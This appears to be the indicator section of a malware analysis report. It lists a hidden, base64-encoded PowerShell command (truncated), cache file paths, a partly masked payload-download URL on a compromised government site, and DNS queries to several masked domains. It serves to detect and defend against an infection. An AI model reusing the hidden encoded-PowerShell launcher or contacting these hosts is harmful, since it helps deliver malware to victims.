Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABWAHEAZwBuAG8AdwB6AGIAagBlAD0AJwBNAG8AdgB1AHIAbABnAGcAaAB6AGwAcgBsACcAOwAkAFUAdwBmAHkAYwB4AHUAaQB5AGMAYwAgAD0AIAAnADEAMgA1ACcAOwAkAFEAdgBqAHoAYgBwAGoAdABvAG0...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://nh######.tuangiao.gov.vn/jodp17ksjfs/ejnBRWuv/
- DNS ASK my###ai.com.my
- DNS ASK nh######.tuangiao.gov.vn
- DNS ASK al####asil.com.br
- DNS ASK bi######ntminer.filmko.info
- DNS ASK wo###indeed.org